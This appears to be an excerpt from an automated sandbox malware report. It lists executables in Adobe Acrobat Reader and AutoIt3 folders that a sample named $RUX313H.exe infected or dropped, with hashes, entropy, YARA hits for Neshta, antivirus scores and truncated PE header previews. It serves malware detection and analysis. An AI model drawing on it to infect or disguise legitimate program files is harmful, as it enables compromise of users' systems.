                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.5232250585402545
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdkLMxpXEZnDJussJ/ngE:sr85Cos4uBJYE
                                                                        MD5:F648557D5287EC8C3677DC5B57E1C6AC
                                                                        SHA1:B04F7B7273C97B1E56FD2B0BE2998D93A7327E75
                                                                        SHA-256:647C4669A29D3D650AE1B750B2DDCFA312FA4AA64552C1D53867B6DDA6A72C73
                                                                        SHA-512:033E2C729A89F75AD4B198A4FC7431C8763F386B5993265F2A16B0B4591CEAB88803CAF4D5952A27F074651988F1FCB09B12EA6CEC2932CD429015DE0ED0B95D
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.186107093668235
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFhUpMPub5+G92qoooZVq/LF:sr85CTqSwgHVqDF
                                                                        MD5:67059EAECEA081CE3E6426BCE980BFF0
                                                                        SHA1:C1EDD7FD96E1C367A0403DD7A8DDA32AA3E13601
                                                                        SHA-256:BC0FBF0B4739B4ED148D96B64308CD8815EAD686DE4400BBBA49E5B90BD7D21D
                                                                        SHA-512:5E3BF07788443B558FBDBA88B41AAAA548D20697FBECF8B31F2CF1D4AC965A858100160ADAC30B7662EE2CBBFF17B3CEFA7A100623DB13C66C8735C5D70DE84E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.667436230875162
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCi3rlNE0YMqYCka4KltvntyHi:sr85Ci7LE0YEKlhtl
                                                                        MD5:E13741E87379B8A0130CCB0F24B56D1E
                                                                        SHA1:C1DF66670A0370F44E9F7BE15FCB60C580992D1F
                                                                        SHA-256:CEDC7E901AA1E9FF96BA749A3239542AD29F62B1C08EA392B721CD28D0D298C8
                                                                        SHA-512:F299C2732A09B5C7870CB9AAF5CAFDFD3DC41A0B81C6102B53962A1E3EA4A2BBC12C20FB788849612B6FEEA2B9571A2BA28A748FAE32BA58281A3C3203177110
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.461209967778202
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCl8H777b4o4yre0zlbTzqYOeg9lZdKMOZo2:sr85Cl8Hn7b4o4kbT93Kxj2
                                                                        MD5:72EC370FCAB5AC9E14C7DE1B93C0B954
                                                                        SHA1:B2216AE2B03F902878D852F9D52FFA704C76F61F
                                                                        SHA-256:DB205349D14EA35D6081598FBDE492AB12BEF4A39555EB9B4F4020C5B492E039
                                                                        SHA-512:6046A04E192C329D56FBC11118269DEEA06053D6C0C41FF5E6225938476B54969A03345D3B46F84B54D7B5262230584218466651E7B4ADDAA0E642AF3CF4F6F2
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.302303877870808
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCeJ8cSLgpA3hKwYPRvGdIab:sr85CncSLgpG88b
                                                                        MD5:B41F70A22F31E1DA8FF057AD47499F3E
                                                                        SHA1:15918D00F2C8DE480C4D3749D5317468C1B14DA0
                                                                        SHA-256:8860EEA648A0CD39281639D27B1B9C981568ACEE9C3DBABDC5D862534F70946E
                                                                        SHA-512:5F0C77A4842BA7FC53CECA4F641FA906EA0D26652876406B52158DC6BC3D36ADCC3A63E6FDA5B226073320ED301A21A6AFC87B930ED4D5B91058172727AB47A4
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.261294291615621
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCmwGqE9qLa7QoIG5fIIXBB8C:sr85CaqcVz5fzsC
                                                                        MD5:F25F4BF1D71532CE97C90BEEC7A56FBC
                                                                        SHA1:337C45D81469B760EB7ADA0316AFC262FE4C3721
                                                                        SHA-256:B24831A423AFFF5E65032A7673D7BA4E35192C43C365FCDE75D678CAF4605F33
                                                                        SHA-512:5AEDA5CCD0F38392FEF3F14AD49EAC63D03ECBFDDC89D326DFE0ED03A225A1E7496B02D5F983168D1D7C96448F90718B6975A8D58EAAA6DF9626C27D4AF96DAC
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.423139673646388
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCULKBHLLkRkjuXi65D5mFv1:sr85CU0LFjAiGI
                                                                        MD5:C4CA362C5EF952BAF96EF61B59D8355D
                                                                        SHA1:5DEB0DAE7262FF31BD9B2C2205D55D2E5D012CEF
                                                                        SHA-256:A679F4131244485FD10E274A510C2B76DF545838B8562E579C9805269834355E
                                                                        SHA-512:49261B804AB74A90DCE657FD7C4FE87F42505F673847C143C42A4CF89E2BF3226C329630ECCBF19FB584071FC4E7DAFFA7725F66A7E7936DC8CDF4A3E73425E3
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.355719905315724
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCdjrXDyO4zkm8dbHVLokF8iJTwRH0n:sr85CVrMzkm8PL3Eo
                                                                        MD5:A42467B5C21814776277B4CE3456D716
                                                                        SHA1:B01DD2412ADA123EF3D6317F839826D37C6A27D4
                                                                        SHA-256:B1A5063A32CB8AFD591C57AAB1A679137EE29A886AF77849A13C26537A100AD9
                                                                        SHA-512:62D2AECABE4892E0E25A9787A28898EC989A4AA54A66CDB7DE65EB48A8634E0274EB6515722EA1FA580C848E1AD683C75CE26F6AB7D7F7E48A5DD064DD1B3A24
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.228109838185618
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC3uireklhKsikOkCWfNU:sr85C+ilU9xL
                                                                        MD5:B9A06C8C07B4BC86001ABCA5835AEED2
                                                                        SHA1:5EA2F32AD6F1642498CDE9F8CA74D8A70DE376E0
                                                                        SHA-256:1531CA6AD23335F3F93231D153CB9DDEE40580A5A82D502AD6F7B54C8328D8B4
                                                                        SHA-512:79C9F72832E53AED9E50C680F0146E6F971D77299E192DD61500E8B91117E19373C7EC92B84A31B2934FD65CD6090E9613BC6F62A2337A1313E7E52A1041B04E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.26326337462311
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCFbIJyoI91593nKMd/VHT:sr85CFboI9133K+HT
                                                                        MD5:7C2E8C0527C5CFF276FB2FFA314D455A
                                                                        SHA1:6B6FD014B9C295838E0F1F2D563C185A0004C028
                                                                        SHA-256:41AEBB2A2B6175595684D20DF5F7B8AB8FEB2B5662530F6593287F9F72777296
                                                                        SHA-512:2138731F6006CB6DF13821E05DC16EDEBF7F70777906AB03271707A1237DBFD8859ED43795F36A87901D63BDAA4CC738E46B9D2D0D6361546FD64A2AE56EB65F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.079745714518026
                                                                        Encrypted:false
                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJCBF45im0N0I9U96lOQ7ABFPXdLtZqWn:JxqjQ+P04wsmJCJ4wNlu9HQIXsW/44
                                                                        MD5:E6A82ED5EA7010F781B63E30C2377BEE
                                                                        SHA1:1829EE1E5E5B34C9721F4EB51E3AD09F7A13DCE2
                                                                        SHA-256:E02365CA739F356FE66B4F49C4D11EC156B0BB512211A177A813FC7D8B0C2DFD
                                                                        SHA-512:2FD5BAF35A018DFF7FCA19A4C118E781FC9D03F9DDED1CEE8F2A5E9E6E41F1C99D984F24E5AB3E60AC2FFBD1B505F728410203D11234197D109BFDEC728ED40D
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.352749197508949
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCZti/kCXBIvpnJXCFgyf:sr85CzgkC+Jt6gA
                                                                        MD5:E784AF0ED9D53B2A29B2EBBDDE7E470B
                                                                        SHA1:203533AB59D90155BE6EC83B9E7FD643869FBA9D
                                                                        SHA-256:D8B35FBB5A6A4E3069FF8E60BB9F35670DEEB5B5933820CCC4FC9D9D4148EB78
                                                                        SHA-512:A2C77DD2CB33815273C4730892FB45F2EB086853CE7544890FA970F666249FCA61AEDFB826109293066C2F615B95CAE48E9C28F96B0C59D6EA0423B337BDF291
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\Au3Check.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.395396839059979
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCBBTfrVijfDZaoXFdP+aWYEsPnBEbfOjBvX5zjjSbE51E6AoAV9:sr85CnfrV5EAVMczsELz7Vz
                                                                        MD5:B4E63C549366CFCDA2363E35C197D41C
                                                                        SHA1:10E1078FF8D1FD5FF2080FCB659A012630FD07E8
                                                                        SHA-256:68BE6B2F5E8181E4E36DB6F370E3110C43D702E6953735FE6843D230FA6E7A37
                                                                        SHA-512:FB0B06847F459BA7D439D20608C3A098AA01B18FEBBF3D014536A3CF21353EC0524922056BF151B3A0F66E00E758C36CDC49B44A59C81F78B6249E93B535C893
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\Au3Info.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.509452568334581
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCXl/TR5SDQQfzSIOOc1c:sr85CXFR5StHe+
                                                                        MD5:A7D23C329BAABBA8B883C9B0EACCE4A5
                                                                        SHA1:0E2B51FF3DA7806D0F5DCB403222D06637B08738
                                                                        SHA-256:C2521122926A26FFDB7E9D56EE6E24682F1C76B573BEE8765E9E287CB1DCAE89
                                                                        SHA-512:22116FE8362AA86EDBD268EF90A415B4E204416C39AB0312EFFA6E3C2C7C6AB85B000A642443DA071F61E3C370398D6C018E8F4582E9E854BAF2B3BCAB7E5D30
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.476428579556002
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJCzbdrFQAj9UlJZ4PAZav4RLRLK:sr85CfQO9UKRGRLK
                                                                        MD5:02879251FEBD3B13DFA84C0DBB3B9387
                                                                        SHA1:D2226312A4460980B036C0CFD3B7BF95752145D9
                                                                        SHA-256:28C72711975DEA1917D0B4C996D93E945F0487DFBDEB1A0B298E9A724F6E8937
                                                                        SHA-512:864BF0149EBBF033306C7B0FBD168D696DFFFEE012B61991C5F0B4D35F82ECE7FE276EBEDE901BF30E22529D8EDEDF3EE3FF64F9D18A411624DB3188ABA45E4E
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                                                                        Process:C:\Users\user\Desktop\$RUX313H.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):82944
                                                                        Entropy (8bit):6.520333669037674
                                                                        Encrypted:false
                                                                        SSDEEP:1536:JxqjQ+P04wsmJC32EQwB3BsLsWIGihj58u9otwqtOk:sr85C325wztj5xiv
                                                                        MD5:32C22D658E9A54E56C54B1A2AFE1D817
                                                                        SHA1:E1DA8AA26A509BC23A761EB25267DCE9F8A7EF92
                                                                        SHA-256:C957D33A54BD308948E37F020C3FD23DCBE4762DF1143EFAE8109433342DE76C
                                                                        SHA-512:C669F6999EA0ABC48D7AEFB32CD067F37B2894C8EDB1EC538063ED47B719A4597C5BFB770C821DE0D0384FE3B4AC212368B629284D8740E8855D7281A84590C9
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Author: Florian Roth
                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Author: Joe Security
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
